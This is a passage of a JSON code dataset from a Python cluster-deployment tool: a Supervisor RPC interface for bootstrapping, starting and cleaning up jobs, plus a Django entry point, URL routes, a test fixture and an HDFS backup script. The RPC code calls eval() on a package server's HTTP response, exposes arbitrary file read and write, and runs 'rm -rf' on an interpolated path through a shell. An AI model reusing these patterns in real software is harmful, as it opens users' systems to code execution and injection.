hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"zookeeper\",\n args.zookeeper_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"zookeeper\",\n args.zookeeper_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.6486364603042603,
"alphanum_fraction": 0.6511532068252563,
"avg_line_length": 36.23356628417969,
"blob_id": "77ec5d65d124e1a92b54c809803b404fd6c9ede0",
"content_id": "18e86bb8f627f0c9e00b6847f3fff1adc80e2a4e",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26622,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 715,
"path": "/supervisor/deployment/rpcinterface.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright (c) 2012, Xiaomi.com.\n# Author: Wu Zesheng <[email protected]>\n\nimport ConfigParser\nimport cStringIO\nimport subprocess\nimport os\nimport time\nimport urllib2\n\nfrom exceptions import RuntimeError\nfrom supervisor.datatypes import DEFAULT_EXPECTED_EXIT_CODE\nfrom supervisor.http import NOT_DONE_YET\nfrom supervisor.options import ClientOptions\nfrom supervisor.rpcinterface import SupervisorNamespaceRPCInterface\nfrom supervisor.states import STOPPED_STATES\nfrom supervisor.supervisorctl import Controller\nfrom supervisor.xmlrpc import Faults\nfrom supervisor.xmlrpc import RPCError\n\nDEFAULT_PACKAGE_ROOT = '/home/work/packages'\nDEFAULT_APP_ROOT = '/home/work/app'\nDEFAULT_LOG_ROOT = '/home/work/log'\nDEFAULT_DATA_DIRS = '/home/work/data'\n\nCONFIG_PATH = 'conf'\nJOB_RUN_CONFIG = 'run.cfg'\n\nSUCCESS_STATUS = 'OK'\n\nclass DeploymentRPCInterface:\n def __init__(self, supervisord, **config):\n self.supervisord = supervisord\n self.global_config = config\n self.supervisor_rpcinterface = SupervisorNamespaceRPCInterface(supervisord)\n self.package_server = config.get('package_server')\n self.download_package_uri = config.get('download_package_uri')\n self.get_latest_package_info_uri = config.get('get_latest_package_info_uri')\n\n def get_run_dir(self, service, cluster, job, instance_id=-1):\n '''\n Get the run directory of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's run root directory\n '''\n app_root = self.global_config.get('app_root', DEFAULT_APP_ROOT)\n if instance_id == -1:\n return '%s/%s/%s/%s' % (app_root, service, cluster, job)\n else:\n return '%s/%s/%s/%s/%s' % (app_root, service, cluster, job, instance_id)\n\n def get_log_dir(self, service, cluster, job, instance_id=-1):\n '''\n Get the log directory of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's log root directory\n '''\n log_root = self.global_config.get('log_root', DEFAULT_LOG_ROOT)\n if instance_id == -1:\n return '%s/%s/%s/%s' % (log_root, service, cluster, job)\n else:\n return '%s/%s/%s/%s/%s' % (log_root, service, cluster, job, instance_id)\n\n def get_stdout_dir(self, service, cluster, job, instance_id=-1):\n '''\n Get the stdout directory of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's log root directory\n '''\n run_dir = self.get_run_dir(service, cluster, job, instance_id)\n return '%s/stdout' % run_dir\n\n def get_available_data_dirs(self, service, cluster, job, instance_id=-1):\n '''\n Get all the available data directories that the specified job may use\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return list all the available data root directories\n '''\n data_dirs = self.global_config.get('data_dirs', DEFAULT_DATA_DIRS)\n if instance_id == -1:\n return ['%s/%s/%s/%s' % (data_dir, service, cluster, job)\n for data_dir in data_dirs.split(',')\n ]\n else:\n return ['%s/%s/%s/%s/%s' % (data_dir, service, cluster, job, instance_id)\n for data_dir in data_dirs.split(',')\n ]\n\n def get_data_dirs(self, service, cluster, job, instance_id=-1):\n '''\n Get all the data directories of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return list the job's data root directories\n '''\n file_name = '%s/%s' % (self.get_run_dir(service, cluster, job, instance_id),\n JOB_RUN_CONFIG)\n if not os.path.exists(file_name):\n return 'You should bootstrapped the job first'\n\n data_dirs = self.get_available_data_dirs(service, cluster, job, instance_id)\n run_config = ConfigParser.SafeConfigParser()\n run_config.read([file_name])\n data_dir_indexes = run_config.get('run_info', 'data_dir_indexes')\n job_data_dirs = []\n for i in data_dir_indexes.split(','):\n job_data_dirs.append(data_dirs[int(i)])\n return job_data_dirs\n\n def get_package_dir(self, service, cluster, job, instance_id=-1):\n '''\n Get the current package directory of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's package root directory(symbol link)\n '''\n return '%s/package' % self.get_run_dir(service, cluster, job, instance_id)\n\n def get_real_package_dir(self, service, cluster, job, instance_id=-1):\n '''\n Get the current package directory real path of the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's package root directory(real path)\n '''\n return os.readlink(self.get_package_dir(service, cluster, job, instance_id))\n\n def get_current_package_dir(self, service, cluster):\n '''\n Get the currently used package directory of the specified service\n\n @param service the service name\n @param cluster the cluster name\n @return string the currently used package directory\n '''\n package_root = self.global_config.get('package_root')\n return '%s/%s/%s/current' % (package_root, service, cluster)\n\n def get_cleanup_token(self, service, cluster, job, instance_id=-1):\n '''\n Get the token used to do cleanuping\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return string the job's cleanup token\n '''\n file_name = '%s/%s' % (self.get_run_dir(service, cluster, job, instance_id),\n JOB_RUN_CONFIG)\n if not os.path.exists(file_name):\n return 'You should bootstrap the job first'\n\n run_config = ConfigParser.SafeConfigParser()\n run_config.read([file_name])\n return run_config.get('run_info', 'cleanup_token')\n\n def bootstrap(self, service, cluster, job, config_dict, instance_id=-1):\n '''\n Bootstrap the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @param config_dict the config information dictionary\n @return string 'OK' on success, otherwise, the error message\n\n Note: config_dict must contain the following item:\n 1. artifact\n 2. bootstrap.sh\n 3. if any config files are needed, just put it in 'config_files' item\n\n config_dict can also contain the following optional items:\n 1. cleanup_token: if this token is specified, user should supply\n the token to do cleanup\n 2. package_name: package_name, revision, timestamp should be specified\n simultaneously, otherwise will be ignored\n 3. revision\n 4. timestamp\n 5. data_dir_indexes: if this is not specified, the first data_dir is\n used by default\n 6. force_update\n This is an example:\n config_dict = {\n 'artifact': 'hadoop',\n 'bootstrap.sh': $bootstrap_file_content,\n 'config_files': {\n 'core-site.xml': $core_site_xml_content,\n ...\n },\n }\n '''\n return self._do_bootstrap(service, cluster, job, instance_id, **config_dict)\n\n def start(self, service, cluster, job, config_dict, instance_id=-1):\n '''\n Start the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @param config_dict the config information dictionary\n @return string 'OK' on success, otherwise, the error message\n\n Note: config_dict must contain the following item:\n 1. start.sh\n 2. artifact\n 3. if any config files are needed, just put it in 'config_files' item\n\n config_dict can also contain the following optional items:\n 1. http_url: the server's http service url\n 2. package_name: package_name, revision, timestamp should be specified\n simultaneously, otherwise will be ignored\n 3. revision\n 4. timestamp\n 5. force_update\n This is an example:\n config_dict = {\n 'start.sh': $start_file_content,\n 'artifact': hadoop,\n 'config_files': {\n 'core-site.xml': $core_site_xml_content,\n ...\n },\n 'http_url': 'http://10.235.3.67:11201',\n }\n '''\n return self._do_start(service, cluster, job, instance_id, **config_dict)\n\n def stop(self, service, cluster, job, config_dict, instance_id=-1):\n '''\n Stop the specified job\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @param config_dict the config information dictionary\n @return string 'OK' on success, otherwise, the error message\n\n Note: config_dict is not used currently, reserved for extendibility\n '''\n return self._do_stop(service, cluster, job, instance_id, **config_dict)\n\n def cleanup(self, service, cluster, job, config_dict, instance_id=-1):\n '''\n Cleanup the specified job's data/log directories\n\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @param config_dict the config information dictionary\n @return string 'OK' on success, otherwise, the error message\n\n Note: config_dict may contain the following item:\n 1. cleanup_token: [optional] token used to do verification\n 2. cleanup.sh: [optional] script used to do cleanuping\n This is an example:\n config_dict = {\n 'cleanup_token': '550e8400-e29b-41d4-a716-446655440000',\n 'cleanup.sh': $cleanup_script,\n }\n '''\n return self._do_cleanup(service, cluster, job, instance_id, **config_dict)\n\n def show(self, service, cluster, job, config_dict, instance_id=-1):\n '''\n Get the specified job's current status\n @param service the server name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @param config_dict the config information dictionary\n @return string the process status\n Possible values of process status:\n RUNNING STARTING BACKOFF STOPPING EXITED FATAL UNKNOWN\n\n Note: config_dict is not used currently, reserved for extendibility\n '''\n return self._do_show(service, cluster, job, instance_id, **config_dict)\n\n def read_file(self, file_path):\n '''\n Read the file with the given file path on server\n @param file_path the name of file to read\n '''\n with open(file_path) as fi:\n return fi.read()\n\n def write_text_to_file(self, file_path, content):\n '''\n Write content to the file with the given file path on server\n @param file_path the name of file to write\n @param content the content to write\n '''\n with open(file_path, 'w') as fi:\n fi.write(content)\n return 'OK'\n\n def append_text_to_file(self, file_path, content):\n '''\n Append content to the file with the given file path on server\n @param file_path the name of file to append\n @param content the content to append\n '''\n with open(file_path, 'a') as fi:\n fi.write(content)\n return 'OK'\n\n def _get_package_uri(self, artifact, revision, timestamp, package_name):\n return '%s/%s/%s/%s-%s/%s' % (self.package_server,\n self.download_package_uri, artifact,\n revision, timestamp, package_name)\n\n def _get_query_latest_package_info_uri(self, artifact):\n return '%s/%s/?artifact=%s' % (self.package_server,\n self.get_latest_package_info_uri, artifact)\n\n def _downlowd_package(self, uri, dest_file):\n data_file = urllib2.urlopen(uri, None, 30)\n if not os.path.exists(os.path.dirname(dest_file)):\n os.makedirs(os.path.dirname(dest_file))\n fp = open(dest_file, 'wb')\n fp.write(data_file.read())\n fp.close()\n data_file.close()\n\n def _write_file(self, file_path, file_content):\n fp = open(file_path, 'wb')\n fp.write(file_content)\n fp.close()\n\n def _write_config_files(self, run_dir, **config_dict):\n for file_name, content in config_dict.iteritems():\n file_path = '%s/%s' % (run_dir, file_name)\n if os.path.exists(file_path):\n os.remove(file_path)\n self._write_file(file_path, content)\n\n def _get_process_name(self, service, cluster, job, instance_id):\n if instance_id == -1:\n return '%s--%s--%s' % (service, cluster, job)\n else:\n return '%s--%s--%s%d' % (service, cluster, job, instance_id)\n\n def _cleanup_dir(self, path):\n # Remove the whole directory in case there are some hidden files.\n cmd = 'rm -rf %s/' % path\n subprocess.check_call(cmd, shell=True)\n\n def _check_dir_empty(self, path):\n if not os.path.exists(path):\n return True\n\n lists = os.listdir(path)\n return len(lists) == 0\n\n def _check_bootstrapped(self, service, cluster, job, instance_id):\n run_dir = self.get_run_dir(service, cluster, job, instance_id)\n return os.path.exists('%s/%s' % (run_dir, JOB_RUN_CONFIG))\n\n def _get_latest_package_info(self, artifact):\n uri = self._get_query_latest_package_info_uri(artifact)\n info_fp = urllib2.urlopen(uri, None, 30)\n info = info_fp.read()\n\n if info and info.startswith('{'):\n info_dict = eval(info)\n info_fp.close()\n return info_dict\n else:\n info_fp.close()\n return None\n\n def _make_package_dir(self, artifact, service, cluster, job, instance_id,\n revision, timestamp, package_name):\n # Check if the tarball is already downloaded, if not, download it\n package_path = '%s/%s/%s/%s-%s/%s' % (self.global_config.get('package_root'),\n service, cluster, revision, timestamp, package_name)\n if not os.path.exists(package_path):\n self._downlowd_package(\n self._get_package_uri(artifact, revision, timestamp, package_name),\n package_path)\n\n # Unpack the tarball\n package_dir = package_path[0: len(package_path) - len('.tar.gz')]\n if os.path.exists(package_dir):\n cmd = ['rm', '-rf', package_dir]\n subprocess.check_call(cmd)\n cmd = ['tar', '-zxf', package_path, '-C', os.path.dirname(package_dir)]\n subprocess.check_call(cmd)\n\n # Link the package dir to the 'current'\n current_dir = self.get_current_package_dir(service, cluster)\n if os.path.lexists(current_dir):\n os.unlink(current_dir)\n os.symlink(package_dir, current_dir)\n\n # Link the package dir to the run dir\n symbol_package_dir = self.get_package_dir(service, cluster, job, instance_id)\n if os.path.lexists(symbol_package_dir):\n os.unlink(symbol_package_dir)\n os.symlink(package_dir, symbol_package_dir)\n return package_dir\n\n def _update_run_cfg(self, file_path, section, key, value):\n run_config = ConfigParser.SafeConfigParser()\n run_config.read([file_path])\n run_config.set(section, key, value)\n fp = open(file_path, 'w')\n run_config.write(fp)\n fp.close()\n\n def _prepare_run_env(self, service, cluster, job, instance_id, **config_dict):\n artifact = config_dict.get('artifact')\n if not artifact:\n return 'Invalid config_dict: can\\'t find artifact'\n\n # Create run dirs\n run_dir = self.get_run_dir(service, cluster, job, instance_id)\n if not os.path.exists(run_dir):\n os.makedirs(run_dir)\n\n # Create stdout dir\n stdout_dir = self.get_stdout_dir(service, cluster, job, instance_id)\n if not os.path.exists(stdout_dir):\n os.makedirs(stdout_dir)\n\n # Create and link log dir to the run dir\n log_dir = self.get_log_dir(service, cluster, job, instance_id)\n if os.path.exists(log_dir):\n if not self._check_dir_empty(log_dir):\n return 'The log dir %s is not empty, please do cleanup first' % log_dir\n else:\n os.makedirs(log_dir)\n symbol_log_dir = '%s/log' % run_dir\n if not os.path.exists(symbol_log_dir):\n os.symlink(log_dir, symbol_log_dir)\n\n # Create and link data dirs to the run dir\n data_dirs = self.global_config.get('data_dirs', DEFAULT_DATA_DIRS).split(',')\n data_dir_indexes = (config_dict.get('data_dir_indexes') or '0')\n for i in data_dir_indexes.split(','):\n if instance_id == -1:\n data_dir = '%s/%s/%s/%s' % (data_dirs[int(i)], service, cluster, job)\n else:\n data_dir = '%s/%s/%s/%s/%s' % (data_dirs[int(i)], service, cluster, job, instance_id)\n if os.path.exists(data_dir):\n if not self._check_dir_empty(data_dir):\n return 'The data dir %s is not empty, please do cleanup first' % data_dir\n else:\n try:\n os.makedirs(data_dir)\n except OSError, e:\n return \"Error: %s\" % str(e)\n symbol_data_dir = '%s/%s' % (run_dir, os.path.basename(data_dirs[int(i)]))\n if not os.path.exists(symbol_data_dir):\n os.symlink(data_dir, symbol_data_dir)\n\n # Check the package information\n force_update = config_dict.get('force_update', False)\n if force_update:\n package_info = self._get_latest_package_info(artifact)\n if package_info:\n package_name = package_info.get('package_name')\n revision = package_info.get('revision')\n timestamp = package_info.get('timestamp')\n else:\n package_name = config_dict.get('package_name')\n revision = config_dict.get('revision')\n timestamp = config_dict.get('timestamp')\n if not (package_name and revision and timestamp):\n package_info = self._get_latest_package_info(artifact)\n if package_info:\n package_name = package_info.get('package_name')\n revision = package_info.get('revision')\n timestamp = package_info.get('timestamp')\n if not (package_name and revision and timestamp):\n return 'No package found on package server of %s' % artifact\n\n # Write the job's run.cfg\n try:\n package_dir = self._make_package_dir(artifact, service, cluster, job,\n instance_id, revision, timestamp, package_name)\n except urllib2.URLError, e:\n return \"%s. There may be an error about your package information.\" % str(e)\n except subprocess.CalledProcessError, e:\n return \"Error: %s\" % str(e)\n cleanup_token = config_dict.get('cleanup_token', str())\n run_config = ConfigParser.SafeConfigParser()\n run_config.add_section('run_info')\n run_config.set('run_info', 'cleanup_token', cleanup_token)\n run_config.set('run_info', 'data_dir_indexes', data_dir_indexes)\n run_config.set('run_info', 'run_dir', run_dir)\n run_config.set('run_info', 'log_dir', log_dir)\n run_config.set('run_info', 'package_dir', package_dir)\n fp = open('%s/%s' % (run_dir, JOB_RUN_CONFIG), 'w')\n run_config.write(fp)\n fp.close()\n return SUCCESS_STATUS\n\n def _do_bootstrap(self, service, cluster, job, instance_id, **config_dict):\n # prepare run dir\n message = self._prepare_run_env(service, cluster, job, instance_id, **config_dict)\n if message != SUCCESS_STATUS:\n return message\n\n # Write other config files to local disk\n config_files = config_dict.get('config_files')\n service_root = self.get_run_dir(service, cluster, job, instance_id)\n if config_files:\n self._write_config_files(service_root, **config_files)\n\n # Do bootstraping\n bootstrap_sh = config_dict.get('bootstrap.sh')\n if bootstrap_sh:\n self._write_file('%s/bootstrap.sh' % service_root, bootstrap_sh)\n cmd = ['/bin/bash', '%s/bootstrap.sh' % service_root]\n subprocess.call(cmd)\n return SUCCESS_STATUS\n\n def _do_start(self, service, cluster, job, instance_id, **config_dict):\n artifact = config_dict.get('artifact')\n if not artifact:\n return 'Inval config_dict: can\\'t find artifact'\n\n if not self._check_bootstrapped(service, cluster, job, instance_id):\n return \"You should bootstrap the job first\"\n\n # Check if need update the package\n force_update = config_dict.get('force_update', False)\n if force_update:\n package_info = self._get_latest_package_info(artifact)\n if package_info:\n package_name = package_info.get('package_name')\n revision = package_info.get('revision')\n timestamp = package_info.get('timestamp')\n else:\n package_name = config_dict.get('package_name')\n revision = config_dict.get('revision')\n timestamp = config_dict.get('timestamp')\n\n if (package_name and revision and timestamp):\n package_path = '%s/%s/%s-%s/%s' % (\n self.global_config.get('package_root'),\n artifact, revision, timestamp, package_name)\n try:\n if not os.path.exists(package_path):\n self._downlowd_package(\n self._get_package_uri(artifact, revision, timestamp, package_name),\n package_path)\n package_dir = self._make_package_dir(artifact, service, cluster, job,\n instance_id, revision, timestamp, package_name)\n except urllib2.URLError, e:\n return \"%s. There may be an error about your package information.\" % str(e)\n except subprocess.CalledProcessError, e:\n return \"Error: %s\" % str(e)\n run_cfg = '%s/%s' % (self.get_run_dir(service, cluster, job, instance_id),\n JOB_RUN_CONFIG)\n self._update_run_cfg(run_cfg, 'run_info', 'package_dir', package_dir)\n\n # Write the start script to local disk\n start_sh = config_dict.get('start.sh')\n service_root = self.get_run_dir(service, cluster, job, instance_id)\n if not start_sh and not os.path.exists('%s/start.sh' % service_root):\n return 'No start script found'\n elif start_sh:\n self._write_file('%s/start.sh' % service_root, start_sh)\n\n # Write other config files to local disk\n config_files = config_dict.get('config_files')\n if config_files:\n self._write_config_files(service_root, **config_files)\n\n # Write supervisor config\n http_url = config_dict.get('http_url', '')\n process_name = self._get_process_name(service, cluster, job, instance_id)\n job_config = ConfigParser.SafeConfigParser()\n section = 'program:%s' % process_name\n job_config.add_section(section)\n job_config.set(section, 'command', '/bin/bash %s/start.sh' % service_root)\n job_config.set(section, 'process_name', process_name)\n job_config.set(section, 'directory', service_root)\n job_config.set(section, 'http_url', http_url)\n # Process will be unconditionally restarted when it exits, without regard\n # to its exit code\n job_config.set(section, 'autorestart', 'true')\n job_config.set(section, 'exitcodes', str(DEFAULT_EXPECTED_EXIT_CODE))\n # Process will NOT be automatically started when supervisor restart.\n job_config.set(section, 'autostart', 'false')\n fp = open('%s/%s/%s.cfg' % (os.getcwd(), CONFIG_PATH, process_name), 'wb')\n job_config.write(fp)\n fp.close()\n\n # Start the job\n self.supervisor_rpcinterface.reloadConfig()\n try:\n self.supervisor_rpcinterface.addProcessGroup(process_name)\n except RPCError, e:\n if e.code != Faults.ALREADY_ADDED:\n raise e\n self.supervisor_rpcinterface.startProcess(process_name)()\n return SUCCESS_STATUS\n\n def _do_stop(self, service, cluster, job, instance_id, **config_dict):\n process_name = self._get_process_name(service, cluster, job, instance_id)\n self.supervisor_rpcinterface.stopProcess(process_name)()\n return SUCCESS_STATUS\n\n def _do_cleanup(self, service, cluster, job, instance_id, **config_dict):\n # check cleanup token\n cleanup_token = config_dict.get('cleanup_token')\n if cleanup_token:\n local_token = self.get_cleanup_token(service, cluster, job, instance_id)\n if local_token != cleanup_token:\n return 'Cleanup token is invalid'\n\n try:\n state = self._do_show(service, cluster, job, instance_id, **config_dict)\n if state == 'RUNNING':\n return 'You should stop the job first'\n except RPCError, e:\n pass\n\n log_dir = self.get_log_dir(service, cluster, job, instance_id)\n cleanup_script = config_dict.get('cleanup.sh', str())\n if cleanup_script:\n service_root = self.get_run_dir(service, cluster, job, instance_id)\n self._write_file('%s/cleanup.sh' % service_root, cleanup_script)\n cmd = ['/bin/bash', '%s/cleanup.sh' % service_root]\n if subprocess.call(cmd) != 0:\n self._cleanup_dir(log_dir)\n return 'Execute cleanup.sh failed'\n\n self._cleanup_dir(log_dir)\n data_dirs = self.get_data_dirs(service, cluster, job, instance_id)\n for data_dir in data_dirs:\n self._cleanup_dir(data_dir)\n\n process_name = self._get_process_name(service, cluster, job, instance_id)\n job_config = '%s/%s/%s.cfg' % (os.getcwd(), CONFIG_PATH, process_name)\n if os.path.exists(job_config):\n os.remove(job_config)\n try:\n self.supervisor_rpcinterface.removeProcessGroup(process_name)\n self.supervisor_rpcinterface.reloadConfig()\n except RPCError, e:\n pass\n return SUCCESS_STATUS\n\n def _do_show(self, service, cluster, job, instance_id, **config_dict):\n info = self.supervisor_rpcinterface.getProcessInfo(\n self._get_process_name(service, cluster, job, instance_id))\n return info.get('statename')\n\ndef check_and_create(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\ndef initialize_deployment_env(**config):\n app_root = config.get('app_root', DEFAULT_APP_ROOT)\n check_and_create(app_root)\n\n log_root = config.get('log_root', DEFAULT_LOG_ROOT)\n check_and_create(app_root)\n\n package_root = config.get('package_root', DEFAULT_PACKAGE_ROOT)\n check_and_create(package_root)\n\n data_dirs = config.get('data_dirs', DEFAULT_DATA_DIRS).split(',')\n for data_dir in data_dirs:\n if not os.path.exists(data_dir):\n raise RuntimeError(\n 'Data dir %s must created before starting supervisord'\n % data_dir)\n\ndef deployment_rpcinterface(supervisord, **config):\n initialize_deployment_env(**config)\n return DeploymentRPCInterface(supervisord, **config)\n\ndef test():\n pass\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.687960684299469,
"alphanum_fraction": 0.6891891956329346,
"avg_line_length": 28.071428298950195,
"blob_id": "e6787ab06bfb74c9de2cdb2c057c0e2afe2a5977",
"content_id": "e14c59a2a4e47f7f9ca18b27fd60a45708576033",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 814,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 28,
"path": "/owl/manage.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\nimport ctypes\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"owl.settings\")\n\n root_path = os.path.abspath(\n os.path.dirname(os.path.realpath(__file__))+ '/..')\n owl_path = os.path.join(root_path, 'owl')\n\n # add libs path for loading module zookeeper\n lib_path = os.path.join(owl_path, \"libs\")\n sys.path.append(lib_path)\n ctypes.cdll.LoadLibrary(os.path.join(lib_path, 'libzookeeper_mt.so.2'))\n\n client_path = os.path.join(root_path, 'client')\n sys.path.append(client_path)\n\n deploy_utils = __import__('deploy_utils')\n conf_path = deploy_utils.get_config_dir()\n\n owl_conf_path = os.path.join(conf_path, 'owl')\n sys.path.append(owl_conf_path)\n\n from django.core.management import execute_from_command_line\n\n execute_from_command_line(sys.argv)\n"
},
{
"alpha_fraction": 0.5544554591178894,
"alphanum_fraction": 0.5643564462661743,
"avg_line_length": 26.545454025268555,
"blob_id": "40abfc62dcd9428d1a3a724c0030691eada787e6",
"content_id": "4ad368bafe8ea69dd31f8df4fa078acbfb61923d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 303,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 11,
"path": "/owl/business/urls.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import patterns, url\nimport views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.index),\n url(r'(?P<id>1)/(?P<access_type>[^/]+)/(?P<label>[^/]+)', views.show_online),\n url(r'(?P<id>2)/(?P<access_type>[^/]+)/(?P<label>[^/]+)', views.show_business),\n)\n"
},
{
"alpha_fraction": 0.5690184235572815,
"alphanum_fraction": 0.5766870975494385,
"avg_line_length": 17.11111068725586,
"blob_id": "55bac1391b56273cb9c10a8a859f8374ef9fa71f",
"content_id": "a5aed48aa51fe660c87dfb042974d2d3b84d2427",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 652,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 36,
"path": "/supervisor/supervisor/tests/fixtures/fakeos.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "from os import *\nfrom os import _exit\nimport os\n\nclass FakeOS:\n def __init__(self):\n self.orig_uid = os.getuid()\n self.orig_gid = os.getgid()\n\n def setgroups(*args):\n return\n\n def getuid():\n return 0\n\n def setuid(arg):\n self.uid = arg\n self.setuid_called = 1\n\n def setgid(arg):\n self.gid = arg\n self.setgid_called = 1\n\n def clear():\n self.uid = orig_uid\n self.gid = orig_gid\n self.setuid_called = 0\n self.setgid_called = 0\n\nfake = FakeOS()\n\nsetgroups = fake.setgroups\ngetuid = fake.getuid\nsetuid = fake.setuid\nsetgid = fake.setgid\nclear = fake.clear\n"
},
{
"alpha_fraction": 0.6103448271751404,
"alphanum_fraction": 0.6129310131072998,
"avg_line_length": 29.526315689086914,
"blob_id": "f92ab9d0005d7f96fd98f8ec5b60c597053577ed",
"content_id": "9b2d72b12d6817a530f67f9312af6cd2e7a64495",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2320,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 76,
"path": "/tank/backup.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport subprocess\nimport time\n\ndef parse_command_line():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description='A utility used to backup tank data')\n\n parser.add_argument('--hadoop_home', default=os.getcwd(),\n help='The local hadoop home directory')\n\n parser.add_argument('--cluster', default='lgprc-xiaomi',\n help='The hadoop cluster name')\n\n parser.add_argument('--backup_root', default='/user/h_tank',\n help='The backup root directory')\n\n parser.add_argument('--tank_home', default=os.getcwd(),\n help='The tank home directory')\n\n args = parser.parse_args()\n return args\n\ndef backup_sqlite(args):\n cmd = ['%s/bin/hdfs' % args.hadoop_home, 'dfs', '-mkdir',\n '-p', '%s/sqlite/' % args.backup_root]\n print cmd\n subprocess.check_call(cmd)\n\n cmd = ['%s/bin/hdfs' % args.hadoop_home, 'dfs', '-copyFromLocal',\n '%s/sqlite/tank.db' % args.tank_home,\n '%s/sqlite/tank.db.%d' % (args.backup_root, int(time.time()))]\n print cmd\n subprocess.check_call(cmd)\n\ndef backup_data(args):\n for dir in os.listdir('%s/data' % args.tank_home):\n if dir.startswith('.'):\n continue\n\n cmd = ['%s/bin/hdfs' % args.hadoop_home, 'dfs', '-mkdir',\n '-p', '%s/data/%s' % (args.backup_root, dir)]\n print cmd\n subprocess.check_call(cmd)\n\n tag_file = '%s/data/%s/tags' % (args.tank_home, dir)\n fp = open(tag_file, 'a+')\n print tag_file\n backed_dirs = [d.strip() for d in fp.readlines()]\n total_dirs = [d for d in os.listdir(\n '%s/data/%s' % (args.tank_home, dir)) if not d.startswith('.')]\n diff_dirs = list(set(total_dirs) - set(backed_dirs) - set(['tags']))\n\n for d in diff_dirs:\n # only backup package whose modification time is older than 30min\n mod_time = os.path.getmtime('%s/data/%s/%s' % (\n args.tank_home, dir, d))\n if time.time() - mod_time < 1800:\n continue\n\n cmd = ['%s/bin/hdfs' % args.hadoop_home, 'dfs', '-copyFromLocal',\n '%s/data/%s/%s' % (args.tank_home, dir, d),\n '%s/data/%s/' % (args.backup_root, dir)]\n print cmd\n subprocess.check_call(cmd)\n fp.write('%s\\n' % d)\n\ndef main():\n args = parse_command_line()\n backup_sqlite(args)\n backup_data(args)\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.69947350025177,
"alphanum_fraction": 0.7009922862052917,
"avg_line_length": 43.890907287597656,
"blob_id": "58d15ceeb5daa1b1cdf5fcf111bc05abf1be51e5",
"content_id": "10b80bac65b3fcdd5d436fa9a5e6f07436b09186",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9876,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 220,
"path": "/client/deploy_fds.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
